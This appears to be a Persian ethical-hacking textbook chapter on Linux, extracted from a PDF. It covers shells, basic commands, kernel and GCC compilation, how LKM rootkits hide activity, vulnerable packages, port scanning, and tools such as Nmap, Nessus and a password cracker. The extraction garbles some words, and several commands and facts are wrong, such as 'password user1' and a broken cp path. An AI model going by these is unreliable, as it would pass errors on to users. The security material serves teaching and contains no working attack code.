ﻣﺪﻳﺮﻳﺖ ﻫﻤﺰﻣﺎن ﭼﻨﺪﻳﻦ ﭘﺮدازش، و زﺑﺎن دﺳﺘﻮري ﺑﺮاي ﻧﻮﺷﺘﻦ ﺷﻞ اﺳﻜﺮﻳﭙﺖ ﻫﺎ ﻫﺴﺘﻨﺪ . ﺷﻞ اﺳﻜﺮﻳﭙﺖ، ﺑﺮﻧﺎﻣﻪ اي اﺳﺖ ﻛﻪ ﺑﻪ زﺑﺎن دﺳﺘﻮري ﺷﻞ ﻧﻮﺷﺘﻪ ﻣﻲ ﺷﻮد و ﻣﺸﺎﺑﻪ ﻓﺎﻳﻞ دﺳﺘﻪ اي MS-DOS اﺳﺖ . .

ﺷﻞ ﻫﺎ ي زﻳﺎدي ﺑﺮاي ﻟﻴﻨﻮﻛﺲ وﺟﻮد دارد . ﻣﻬﻢ ﺗﺮﻳﻦ ﺗﻔﺎوت ﺑﻴﻦ آﻧﻬﺎ ، زﺑﺎن دﺳﺘﻮر اﺳﺖ . ﺑﺮاي ﻣﺜﺎل، ﺷﻞ C ( csh ) ﻣﺸﺎﺑﻪ زﺑﺎن ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﻲ C اﺳﺖ . ﺷﻞ sh ) classic Bourne ) از زﺑﺎن دﺳﺘﻮري دﻳﮕﺮي اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . اﻧﺘﺨﺎب ﻳﻚ ﺷﻞ ، اﻏﻠﺐ ﺑﺮ ﻣﺒﻨﺎي زﺑﺎﻧﻲ دﺳﺘﻮري اﺳﺖ ﻛﻪ اراﺋﻪ ﻣﻲ دﻫﺪ و ﻣﺸﺨﺺ ﻛﻨﻨﺪه ﻗﺎﺑﻠﻴﺘﻬﺎي در دﺳﺘﺮس ﺑﺮاي ﻛﺎرﺑﺮ اﺳﺖ . .

GNU Bash ، ﻛﻪ ﻣﺸﺘﻘﻲ از Bash اﺳﺖ، ﺑﺴﻴﺎري از ﻗﺎﺑﻠﻴﺘﻬﺎي ﭘﻴﺸﺮﻓﺘﻪ ﻫﻤﭽﻮن ﻛﻨﺘﺮل ﭘﺮدازش ( job control) ، ﺗﺎرﻳﺨﭽﻪ دﺳﺘﻮرات، ﺗﻜﻤﻴﻞ دﺳﺘﻮرات و اﺳﻢ ﻓﺎﻳﻞ ﻫﺎ، و اﻳﻨﺘﺮﻓﻴﺴﻲ ﺑﺮاي وﻳﺮاﻳﺶ ﻓﺎﻳﻞ ﻫﺎ .دراد ﺷ ﻞ راﻳﺞ دﻳﮕﺮ، tcsh اﺳﺖ ﻛﻪ ﻧﺴﺨﻪ اي از ﺷ ﻞ C ﺑﺎ ﻋﻤﻠﻜﺮد ﻫﺎي ﭘﻴﺸﺮﻓﺘﻪ اﺳﺖ ﻞﺷ. ﻫﺎي دﻳﮕﺮ ﻋﺒﺎرﺗﻨﺪ از small Bourne ، zsh BSD's ash ، ksh ، likne shel و rc . .

دﺳﺘﻮرات ﭘﺎﻳﻪ ﻟﻴﻨﻮﻛﺲ

ﻓﺎﻳﻞ ﻫﺎ و داﻳﺮﻛﺘﻮري :ﻫﺎ :ﻫﺎ

• ﺣﺪاﻛﺜﺮ ﻃﻮل ﻓﺎﻳﻞ، 256 ﻛﺎراﻛﺘﺮ اﺳﺖ • ﺑﻴﻦ ﺣﺮوف ﺑﺰرگ و ﻛﻮﭼﻚ ﺗﻔﺎوت وﺟﻮد دارد • داﺷﺘﻦ ﭘﺴﻮﻧﺪ ﺑﺮاي ﻓﺎﻳﻞ ﺿﺮوري ﻧﻴﺴﺖ touch file.txt : ﻓﺎﻳﻞ file.txt را اﻳﺠﺎد ﻣﻲ ﻛﻨﺪ

[cat [file : ﻣﺤﺘﻮﻳﺎت داﺧﻞ ﻓﺎﻳﻞ را ﻧﺸﺎن ﻣﻲ دﻫﺪ head file.txt : 10 ﺧﻂ اول ﻓﺎﻳﻞ ﻣﺘﻨﻲ را ﻧﻤﺎﻳﺶ ﻣﻲ دﻫﺪ . ﻫﻤﭽﻨﻴﻦ دﺳﺘﻮر head -25 file.txt ، 25 ﺧﻂ او ﻓﺎﻳﻞ را ﻧﻤﺎﻳﺶ ﻣﻲ دﻫﺪ tail file.txt : 10 ﺧﻂ آﺧﺮ ﻓﺎﻳﻞ ﻣﺘﻨﻲ را ﻧﻤﺎﻳﺶ ﻣﻲ دﻫﺪ . ﻫﻤﭽﻨﻴﻦ دﺳﺘﻮر tail -25 file.txt ، 25 ﺧﻂ آﺧﺮ ﻓﺎﻳﻞ را ﻧﻤﺎﻳﺶ ﻣ ﻲ دﻫﺪ cp file newfile : ﺑﺮاي ﻛﭙﻲ ﻛﺮدن ﻓﺎﻳﻞ mv file newfile : ﺑﺮاي ﺟﺎﺑﺠﺎ ﻛﺮدن ﻓﺎﻳﻞ

[mkdir [directoryname : ﺑﺮاي ﺳﺎﺧﺖ ﻓﻮﻟﺪر

202

rm file : ﺑﺮاي ﺣﺬف ﻛﺮدن ﻓﺎﻳﻞ ls : ﻣﻌﺎدل دﺳﺘﻮر dir در وﻳﻨﺪوز اﺳﺖ و ﻣﺤﺘﻮﻳﺎت ﻣﺴﻴﺮ ﺟﺎري را ﻧﺸﺎن ﻣﻲ دﻫﺪ pwd : ﻣﺴﻴﺮ ﺟﺎري را ﻧﺸﺎن ﻣﻲ دﻫﺪ arp : ﺑﺮاي ﺑﺮرﺳﻲ ارﺗﺒﺎط اﺗﺮﻧﺘﻲ ﻣﻮﺟﻮد و آدرس IP اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد ifconfig : اﺑﺰار ﺧﻂ دﺳﺘﻮري ﻛﻪ ﺑﺮاي ﭘﻴﻜﺮﺑﻨﺪي ﻳﺎ ﺑﺮرﺳﻲ ﺗﻤﺎم اﻳﻨﺘﺮﻓﻴﺲ ﻫﺎي ﺷﺒﻜﻪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد netstat : ﺧﻼﺻﻪ اي از ارﺗﺒﺎﻃﺎت ﺷﺒﻜﻪ اي و وﺿﻌﻴﺖ ﺳﻮﻛﺖ ﻫﺎ ﻣﻲ دﻫﺪ nslookup : ﻧﺎم داﻣﻴﻦ و اﻃﻼﻋﺎت IP ﺳﺮور را ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ ping : ﺑﺴﺘﻪ ﻫﺎي آزﻣﺎﻳﺸﻲ ﺑﻪ ﻳﻚ ﺳﺮور لﺎﺳرا ﻣ ﻲ ﺪﻨﻛ ﺗﺎ ﺑﺮر ﺳﻲ ﻛﻨﺪ ﺗﺎ ﭘﺎﺳﺦ درﺳﺖ ﺑﺮﻣﻲ ﮔﺮداﻧﺪ ﻳﺎ ﺧﻴﺮ w : ﺗﻤﺎم session ﻫﺎﻳﻲ ﻛﻪ ﺑﻪ اﻳﻦ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺷﺪه اﺳﺖ را ﻧﺸﺎن ﻣﻲ دﻫﺪ ps : ﺗﻤﺎم ﭘﺮدازش ﻫﺎي در ﺣﺎل اﺟﺮاي ﺳﺮور را ﻧﺸﺎن ﻣﻲ دﻫﺪ route : ﺟﺪول ﻣﺴﻴﺮﻳﺎﺑﻲ ﺳﺮور را ﻧﺸ ﺎن ﻣﻲ دﻫﺪ shred : ﻓﺎﻳﻞ را ﺑﻪ ﺻﻮرت اﻣﻦ ﺑﺎ overwrite ﻛﺮدن ﻣﺤﺘﻮا، ﭘﺎك ﻣﻲ ﻛﻨﺪ traceroute : ﻣﺴﻴﺮﻫﺎي ﺷﺒﻜﻪ اي ﻣﻮﺟﻮد را ﺑﻪ ﻳﻚ ﻛﺎﻣﭙﻴﻮﺗﺮ ردﻳﺎﺑﻲ ﻣﻲ ﻛﻨﺪ adduser user1 : ﺳﺎﺧﺖ ﻛﺎرﺑﺮ password user1 : ﻗﺮار دادن ﭘﺴﻮرد ﺑﺮاي ﻛﺎرﺑﺮ user1

203

داﻳﺮﻛﺘﻮري ﻫﺎي ﻟﻴﻨﻮﻛﺲ : : bin : ﻓﺎﻳﻞ ﻫﺎي ﺑﺎﻳﻨﺮي ( اﺟﺮاﻳﻲ ) sbin : ﻓﺎﻳﻞ ﻫﺎي ﺑﺎﻳﻨﺮي ﺳﻴﺴﺘﻤﻲ ( ﺗﻮﺳﻂ ﻣﺪﻳﺮان اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد ) ) etc : ﻓﺎﻳﻞ ﻫﺎي ﭘﻴﻜﺮﺑﻨﺪي include : ﻓﺎﻳﻞ ﻫﺎي include lib : ﻓﺎﻳﻞ ﻫﺎي ﻛﺘﺎﺑﺨﺎﻧﻪ اي src : ﻓﺎﻳﻞ ﻫﺎي ﻣﻨﺒﻊ doc : ﻓﺎﻳﻞ ﻫﺎي اﺳﻨﺎد man : ﻓﺎﻳﻞ ﻫﺎي manual ( راﻫﻨﻤﺎ ) ) share : ﻓﺎﻳﻞ ﻫﺎي ﺑﻪ اﺷﺘﺮاك ﮔﺬاﺷﺘﻪ ﺷﺪه

ﻧﺤﻮه ﻛﺎﻣﭙﺎﻳﻞ ﻛﺮﻧﻞ ﻟﻴﻨﻮﻛﺲ

ﺑﻪ ﺧﺎﻃﺮ ﻃﺒﻴﻌﺖ اﭘﻦ ﺳﻮرس ﺑﻮدن ﻟﻴﻨﻮﻛﺲ، ﻛﺪ ﻣﻨﺒﻊ ﺑﺼﻮرت راﻳﮕﺎن ﺗﻮزﻳﻊ ﺷﺪه اﺳﺖ . ﻛﺪ ﻣﻨﺒﻊ ﺑﻪ ﻋﻨﻮان ﻓﺎﻳﻞ ﻫﺎي ﺑﺎﻳﻨﺮي ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﺮاي ﻛﺎرﻛﺮد ﺻﺤﻴﺢ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ، ﻛﺎﻣﭙﺎﻳﻞ ﺷﻮﻧﺪ . ﻓﺎﻳﻞ ﻫﺎي ﺑﺎﻳﻨﺮي، در دﺳﺘﺮس ﻫﻤﮕﺎن ﻫﺴﺘﻨﺪ و ﻫﺮ ﻛﺴﻲ ﻣﻲ ﺗﻮاﻧﺪ آﻧﻬﺎ را داﻧﻠﻮد و ﺗﻐﻴﻴﺮ اﺗ ﻲ در آﻧﻬﺎ اﻳﺠﺎد ﻛﻨﺪ ﺗﺎ ﻋﻤﻠﻜﺮد آﻧﻬﺎ را ﺗﻐﻴﻴﺮ دﻫﺪ . ﻋﻤﻮﻣﺎ، ﺳﻪ دﻟﻴﻞ ﺑﺮاي ﻛﺎﻣﭙﺎﻳﻞ ﻣﺠﺪد ﻛﺮﻧﻞ ﻟﻴﻨﻮﻛﺲ وﺟﻮد دارد . اول اﻳﻨﻜﻪ، ﻣﻤﻜﻦ اﺳﺖ ﺷﻤﺎ ﺳﺨﺖ اﻓﺰاري داﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺴﻴﺎر ﺟﺪﻳﺪ ﺑﺎﺷ ﺪ و ﺑ ﺮاي آﻧﻬﺎ، ﻣﺎژول ﻛﺮﻧﻞ ﺑﺮ روي CD وﺟﻮد ﻧﺪاﺷﺘﻪ ﺑﺎﺷﺪ . دوم اﻳﻨﻜﻪ، ﻣﻤﻜﻦ اﺳﺖ ﺷﻤﺎ ﻣﺸﻜﻼﺗﻲ داﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺎ اﺻﻼح ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺑﺮﻃﺮف ﺷﻮﻧﺪ . و ﻧﻬﺎﻳﺘﺎ اﻳﻨﻜﻪ، ﻣﻤﻜﻦ اﺳﺖ ﻧﺮم اﻓﺰارﻫﺎي ﺟﺪﻳﺪي داﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻧﻴﺎز ﺑﻪ ﻧﺴﺨﻪ ﺟﺪﻳﺪﺗﺮ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ داﺷﺘﻪ ﺑﺎﺷﻨﺪ . .

ﻛﺎرﺑﺮان ﺑﺎﻳﺪ درﺑﺎره ﺳﺎﻳﺖ ﻲﻳﺎﻫ ﻛﻪ از آن، داﻧﻠﻮد ﻣﻲ ﻛﻨﻨﺪ ﻣﺤﺘﺎط ﺑﺎﺷﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ، ﻣﻤﻜﻦ اﺳﺖ ﺷﺎﻣﻞ ﺗﺮوﺟﺎن ﻳﺎ backdoor ﺑﺎﺷﻨﺪ . ﺑﻪ دﻻﻳﻞ اﻣﻨﻴﺘﻲ، ﻟﻴﻨﻮﻛﺲ را ﺗﻨﻬﺎ از وب ﺳﺎﻳﺖ ﻫﺎي ﻗﺎﺑﻞ اﻋﺘﻤﺎد و ﺷﻨﺎﺧﺘﻪ ﺷﺪه، داﻧﻠﻮد ﻛﻨﻴﺪ . .

راﻳﺞ ﺗﺮﻳﻦ ﺳﺎﻳﺖ ﺑﺮاي داﻧﻠﻮد ﻛﺮﻧﻞ ﻟﻴﻨﻮﻛﺲ، ftp.kernel.org اﺳﺖ

ﺑﺮاي داﻧﻠﻮد، ﭘﻴﻜﺮﺑﻨﺪي و ﻛﺎﻣﭙﺎﻳﻞ ﻛﺮﻧﻞ ﻟﻴﻨﻮﻛﺲ، ﻣﺮاﺣﻞ زﻳﺮ را اﻧﺠﺎم دﻫﻴﺪ : :

.1 آﺧﺮﻳﻦ ﻧﺴﺨﻪ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ را ﭘﻴﺪا ﻛﻨﻴﺪ و آن را داﺧﻞ داﻳﺮﻛﺘﻮري usr/src/ روي ﺳﻴﺴﺘﻢ ﻟﻴﻨﻮﻛﺲ داﻧﻠﻮد ﻛﻨﻴﺪ . از دﺳﺘﻮر tar zxf ﺑﺮاي ﺑﺎز ﻛﺮدن آن اﺳﺘﻔﺎده ﻛﻨﻴﺪ. .2 ﻣﺮﺣﻠﻪ ﺑﻌﺪي، ﭘﻴﻜﺮﺑﻨﺪي ﻛﺮﻧﻞ ﻟﻴﻨﻮﻛﺲ اﺳﺖ . داﻳﺮﻛﺘﻮري را ﺑﻪ usr/src/Linux/ ﺗﻐﻴﻴﺮ دﻫﻴﺪ و make menuconfig را ﺗﺎﻳﭗ ﻛﻨﻴﺪ . اﻳﻦ دﺳﺘﻮر، ﺗﻌﺪادي ﺑﺮﻧﺎﻣﻪ ﻣﻲ ﺳﺎزد و ﺳﭙﺲ ﺑﻪ ﺳﺮﻋﺖ ﭘﻨﺠﺮه اي را ﻧﺸﺎن ﻣﻲ دﻫﺪ . ﭘﻨﺠﺮه menu ﺑﻪ ﺷﻤﺎ اﺟﺎزه ﻣﻲ دﻫﺪ ﺟﻨﺒﻪ ﻫﺎي ﻣﺨﺘﻠﻒ ﭘﻴﻜﺮﺑﻨﺪي ﻛﺮﻧﻞ را ﺗﻐﻴﻴﺮ دﻫﻴﺪ . ﭘﺲ از اﻧﺠﺎم ﺗﻐﻴﻴﺮات ﺿﺮوري، ﺗﻨﻈﻴﻤﺎت را ذﺧﻴﺮه ﻛﻨﻴﺪ و make dep; make clean را ﺗﺎﻳﭗ ﻛﻨﻴﺪ . اوﻟﻴﻦ دﺳﺘﻮر، درﺧﺘﻲ 204

از واﺑﺴﺘﮕﻲ ﻫﺎي ﻣﺘﻘﺎﺑﻞ در ﻣﻨﺎﺑﻊ ﻛﺮﻧﻞ ﻣﻲ ﺳﺎزد . ﻣﻤﻜﻦ اﺳﺖ اﻳﻦ واﺑﺴﺘﮕﻲ ﻫﺎ، ﺑﺎ ﺗﻨﻈﻴﻤﺎﺗﻲ ﻛﻪ ﺷﻤﺎ در ﻣﺮﺣﻠﻪ ﭘﻴﻜﺮﺑﻨﺪي اﻧﺘﺨﺎب ﻛﺮده اﻳﺪ، ﺗﻐﻴﻴﺮ ﻛﻨ .ﺪﻨ ﺑﺎ اﺳﺘﻔﺎده از دﺳﺘﻮر clean ، ﺗﻤﺎم ﻓﺎﻳﻞ ﻫﺎي ﻧﺎﺧﻮاﺳﺘﻪ از ﻧﺴﺨﻪ ﻗﺒﻠﻲ ﻛﺮﻧﻞ ﭘﺎك ﻣﻲ ﺷﻮد. .3 دﺳﺘﻮرات ﺑﻌﺪي، make zImage و make modules ، ﻣﻤﻜﻦ اﺳﺖ زﻣﺎن ﺑﻴﺸﺘﺮي ﺻﺮف ﻛﻨﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ آﻧﻬﺎ در ﺣﺎل ﻛﺎﻣﭙﺎﻳﻞ ﻛﺮﻧﻞ ﻫﺴﺘﻨﺪ. .4 آﺧﺮﻳﻦ ﻣﺮﺣﻠﻪ، ﻧﺼﺐ ﻛﺮﻧﻞ ﺟﺪﻳﺪ اﺳﺖ . در ﺳﻴﺴﺘﻢ ﻣﺒﺘﻨﻲ ﺑﺮ اﻳﻨﺘﻞ، ﻛﺮﻧﻞ ﺑﺎ دﺳﺘﻮر زﻳﺮ در boot/ ﻧﺼﺐ ﻣﻲ ﺷﻮد: cp /usr/Linux/src/arch/i386/boot/zImage/boot/newkernel

.5 ﺳﭙﺲ از دﺳﺘﻮر make modules_install اﺳﺘﻔﺎده ﻛﻨﻴﺪ . اﻳﻦ دﺳﺘﻮر، ﻣﺎژول ﻫﺎ را در lib/modules/ ﻧﺼﺐ ﻣﻲ ﻛﻨﺪ. .6 ﺳﭙﺲ، etc/lilo.conf/ را وﻳﺮاﻳﺶ ﻛﻨﻴﺪ ﺗﺎ ﺑﺨﺸﻲ ﻣﺸﺎﺑﻪ زﻳﺮ را اﺿﺎﻓﻪ ﻛﻨﻴﺪ: image = /boot/newkernel label = new read-only

.7 در راه اﻧﺪازي ﻣﺠﺪد، ﻛﺮﻧﻞ ﺟﺪﻳﺪ را در lilo اﻧﺘﺨﺎب ﻛﻨﻴﺪ و ﻛﺮﻧﻞ ﺟﺪﻳﺪ را ﺑﺎرﮔﺬاري ﻣﻲ ﻛﻨﺪ . اﮔﺮ ﻛﺎر ﻛﺮد، آن را ﺑﻪ ﻣﻮﻗﻌﻴﺖ اوﻟﻴﻪ در lilo.conf اﻧﺘﻘﺎل دﻫﻴﺪ.

Linux live CD ، اﻧﺘﺨﺎب ﺧﻮﺑﻲ ﺑﺮاي ﺗﺎزه ﻛﺎرﻫﺎ در ﻟﻴﻨﻮﻛﺲ اﺳﺖ . ﺑﺎ اﺳﺘﻔﺎده از اﻳﻦ CD ﻫﺎ، ﻣﻲ ﺗﻮاﻧﻴﺪ ﺑﺪون

اﻳﻨﻜﻪ ﻟﻴﻨﻮﻛﺲ را روي ﺳﻴﺴﺘﻢ ﻧﺼﺐ ﻛﻨﻴﺪ، ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ را ﺗﺴﺖ و ﺳﭙﺲ اﺳﺘﻔﺎده ﻛﻨﻴﺪ . ﺑﺮاي اﺳﺘﻔﺎده از

CD ﻫﺎي live ﻣﻲ ﺗﻮاﻧﻴﺪ ﺑﻪ ﺳﺎﻳﺖ www.distrowatch.com ﻣﺮاﺟﻌﻪ ﻛﺮده و ﺗﻮزﻳﻊ ﻣﻨﺎﺳﺐ آن را اﻧﺘﺨﺎب و ﺑﺮ

روي CD راﻳﺖ ﻛﻨﻴﺪ . اﻳﻦ CD را داﺧﻞ دﺳﺘﮕﺎه ﺑﮕﺬارﻳﺪ و ﻛﺎﻣﭙﻴﻮﺗﺮ ر ا از ﻃﺮﻳﻖ آن راه اﻧﺪازي ﻛﻨﻴﺪ . .

205

دﺳﺘﻮرات ﻛﺎﻣﭙﺎﻳﻞ GCC

GCC ، ﻳﻚ ﻛﺎﻣﭙﺎﻳﻠﺮ ﺧﻂ دﺳﺘﻮري ( command-line ) اﺳﺖ ﻛﻪ ﻛﺪ را ﻣﻲ ﮔﻴﺮد و آن را ﻗﺎﺑﻞ اﺟﺮا ﻣﻲ ﺳﺎزد . ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ آن را از http://gcc.gnu.org داﻧﻠﻮد ﻛﻨﻴﺪ . اﻳﻦ ﻛﺎﻣﭙﺎﻳﻠﺮ، ﺑﺮاي ﻛﺎﻣﭙﺎﻳﻞ و اﺟﺮاي ﺑﺮﻧﺎﻣﻪ ﻫﺎي C++ ، C و ﻓﺮﺗﺮن اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد ﺑﻨﺎﺑﺮاﻳﻦ آﻧﻬﺎ در ﻟﻴﻨﻮﻛﺲ ﻫﻢ اﺟﺮا ﻣﻲ ﺷﻮﻧﺪ . .

دﺳﺘﻮر زﻳﺮ ﺑﺮاي ﻛﺎﻣﭙﺎﻳﻞ ﻛﺪ ++C ﺑﺎ GCC ﺑﺮاي اﺳﺘﻔﺎده ﺑﻪ ﻋﻨﻮان ﻳﻚ ﺑﺮﻧﺎﻣﻪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد : : g++ filename.cpp –o outputfilename.out

دﺳﺘﻮر ﻛﺎﻣﭙﺎﻳﻞ ﻛﺪ C ﺑﺎ GCC ﺑﺮاي اﺳﺘﻔﺎده از آن ﺑﻪ ﻋﻨﻮان ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺑﺼﻮ رت زﻳﺮ اﺳﺖ : : gcc filename.c –o outputfilename.out

ﻧﺤﻮه ﻧﺼﺐ ﻣﺎژول ﻫﺎي ﻛﺮﻧﻞ ﻟﻴﻨﻮﻛﺲ

ﻣﺎژول ﻫﺎي ﻛﺮﻧﻞ ﻟﻴﻨﻮﻛﺲ ( LKM) ، ﺑﻪ ﺷﻤﺎ اﺟﺎزه ﻣﻲ ﻨدﻫ ﺪ ﻛﻪ ﺑﺪون ﻛﺎﻣﭙﺎﻳﻞ دوﺑﺎره ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ، ﻋﻤﻠﻜﺮدي را ﺑﻪ آن اﺿﺎﻓﻪ ﻛﻨﻴﺪ . ﺧﻄﺮ اﺳﺘﻔﺎده از LKM اﻳﻦ اﺳﺖ ﻛﻪ ﻳﻚ rootkit ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ آﺳﺎﻧﻲ ﺑﻪ ﻋﻨﻮان ﻳﻚ LKM اﻳﺠﺎد ﺷﻮد و اﮔﺮ ﺑﺎرﮔﺬاري ﺷﻮد، ﻛﺮﻧﻞ را آﻟﻮده ﻣﻲ ﻛﻨﺪ . ﺑﻨﺎﺑﺮاﻳﻦ، ﺷﻤﺎ ﺑﺎﻳﺪ LKM ﻫﺎ را ﻓﻘﻂ از ﻣﻨﺎﺑﻊ ﻣﻌﺘﺒﺮ داﻧﻠﻮد ﻛﻨﻴﺪ . ﻣﺜﺎﻟﻲ از LKM rootkit ﻫﺎ ﻋﺒﺎرﺗﻨﺪ از : Adore ، Knark ، و Rtkit . از آﻧﺠﺎﺋﻴﻜﻪ آﻧﻬﺎ ﻛﺮﻧﻞ را آﻟﻮده ﻣﻲ ﻛﻨﻨﺪ، ﺷﻨﺎﺳﺎﻳﻲ ا ﻳﻦ rootkit ﻫﺎ، ﺑﺴﻴﺎر دﺷﻮار اﺳﺖ . زﻣﺎﻧﻴﻜﻪ ﺳﻴﺴﺘﻤﻲ ﺑﻪ ﺧﻄﺮ اﻓﺘﺎد، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ LKM را در داﻳﺮﻛﺘﻮري tmp/ ﻳﺎ var/tmp/ ﻗﺮار دﻫﺪ ﻛﻪ ﺑﺎ ﻣﺨﻔﻲ ﻛﺮدن ﭘﺮدازش ﻫﺎ، ﻓﺎﻳﻞ ﻫﺎ، و ارﺗﺒﺎﻃﺎت ﺷﺒﻜﻪ اي، ﻧﻤﻲ ﺗﻮاﻧﺪ ﺗﻮﺳﻂ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﻣﺎﻧﻴﺘﻮر ﺷﻮد . ﻓﺮاﺧﻮاﻧﻲ ﺳﻴﺴﺘﻢ، ﺑﺎ آﻧﻬﺎﻳﻲ ﻛﻪ ﻫﻜﺮ ﺑﺮ روي ﺳ ﻴﺴﺘﻤﻲ ﻛﻪ ﺑﺎ LKM rootkit آﻟﻮده ﺷﺪه اﺳﺖ، و اﻧﺘﺨﺎب ﻛﺮده اﺳﺖ ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲ ﺷﻮد . دﺳﺘﻮر ﺑﺎرﮔﺬاري LKM ﺑﺼﻮرت modprobe LKM اﺳﺖ . .

آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﻟﻴﻨﻮﻛﺲ

از آﻧﺠﺎﺋﻴﻜﻪ ﻛﺪ ﻣﻨﺒﻊ ﻟﻴﻨﻮﻛﺲ در دﺳﺘﺮس ﻫﻤﮕﺎن اﺳﺖ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ آن دﺳﺘﺮﺳﻲ داﺷﺘﻪ ﺑﺎﺷﺪ . ﺑﺮﺧﻲ از آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎﻳﻲ ﻛﻪ وﺟﻮد دارد ﻋﺒﺎرﺗﻨﺪ از : :

• cfengine ، cdrecord ، bugzilla ، bind ، balsa ، Appache • fileutils ، fetchmail (many) ، exim ، evolution ، ethereal (many) ، cvs ، cups ، Cron

206

• kernel ، kerberos ، KDE ، iproute ، inetd ، hylafax ، gzip ، gnupg ، glibc ، ghostscript ، Gdm • openssh ، MYSQL ، mutt ، mplayer ، mpg123 ، mozilla ، man ، mailman ، lynx ، lsh ، Lprng ، openssl • sendmail ، screen ، samba ، rsync ، python ، proftpd ، PostgreSQL ، postfix ، PHP ، pine ، Perl ، xpdf ، xinetd ، XFree86 ، xchat ، wu-ftpd ، wget ، webmin ، vim ، tcpdump ، sudo ، stunnel ، snort ، zlib

زﻣﺎﻧﻴﻜﻪ آدرس IP ﺳﻴﺴﺘﻢ ﻫﺪف ﻣﺸﺨﺺ ﺑﺎﺷﺪ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﻓﺮآﻳﻨﺪ اﺳﻜﻦ ﭘﻮرت را اﻧﺠﺎم دﻫﺪ و ﺑﻪ دﻧﺒﺎل ﺣﻔﺮه ﻫﺎﻳﻲ در ﺳﻴﺴﺘﻢ ﺑﺎﺷﺪ ﺗﺎ ﺑﺘﻮاﻧﺪ ﺑﻪ آن دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ . ﻫﺮ ﺳﻴﺴﺘﻤﻲ داراي 65535 ﭘﻮرت دارد ﻫﻢ ﺑﺮاي TCP و ﻫﻢ ﺑﺮاي UDP دارد ( در ﻣﺠﻤﻮع 131070 ﭘﻮرت ) ﻛﻪ ﻫﺮ ﻛ ﺪام از اﻳﻦ ﭘﻮرت ﻫﺎ راﻫﻲ ﺑﺎﻟﻘﻮه ﺑﺮاي ﻧﻔﻮذ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺴﺘﻨﺪ . .

اﺑﺰارﻫﺎي ﻫﻚ Nmap ، اﺑﺰاري ﺑﺮاي ﻣﺸﺨﺺ ﻛﺮدن ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎي روﺷﻦ و ﺳﺮوﻳﺲ ﻫﺎﻳﻲ ﻛﻪ ﺑﺮ روي آﻧﻬﺎ ﻓﻌﺎل ﻫﺴﺘﻨﺪ، اﺳﺖ . اﻳﻦ اﺑﺰار ﺑﺮاي ﻣﺪﻳﺮان ﺷﺒﻜﻪ ﻧﻴﺰ ﺑﺴﻴﺎر ﺳﻮدﻣﻨﺪ اﺳﺖ . .

Nessus : ﺑﺎ اﻳﻦ اﺑﺰار، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺪف ﻣﺘﺼﻞ ﺷﻮد و آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي آن را ﻛﺸﻒ ﻛﻨﺪ از ﻗﺒﻴﻞ ﺧﻄﺎﻫﺎ در ﭘﻴﻜﺮﺑﻨﺪي، ﺗﻨﻈﻴﻤﺎت ﭘﻴﺶ ﻓﺮض ﻛﻪ ﺑﻪ ﻫﻜﺮ اﺟﺎزه دﺳﺘﺮﺳﻲ را ﻣﻲ دﻫﻨﺪ، و ﻧﻴﺰ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﺟﺪﻳﺪ ﺳﻴﺴﺘﻢ . Nessus ، اﺑﺰاري ﻗﺪرﺗﻤﻨﺪ ﺑﺮاي اﺳﻜﻦ ﺷﺒﻜﻪ اﺳﺖ . .

Xcrack ، اﺑﺰاري ﺳﺮ ﻳﻊ ﺑﺮاي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد در ﻟﻴﻨﻮﻛﺲ اﺳﺖ ﻛﻪ ﺑﺎ اﺳﺘﻔﺎده از دﻳﻜﺸﻨﺮي ﻛﻪ از ﻛﺎرﺑﺮ ﻣﻲ ﮔﻴﺮد، ﺷﺮوع ﺑﻪ ﭘﻴﺪا ﻛﺮدن ﭘﺴﻮردﻫﺎ ﻣﻲ ﻛﻨﺪ . .

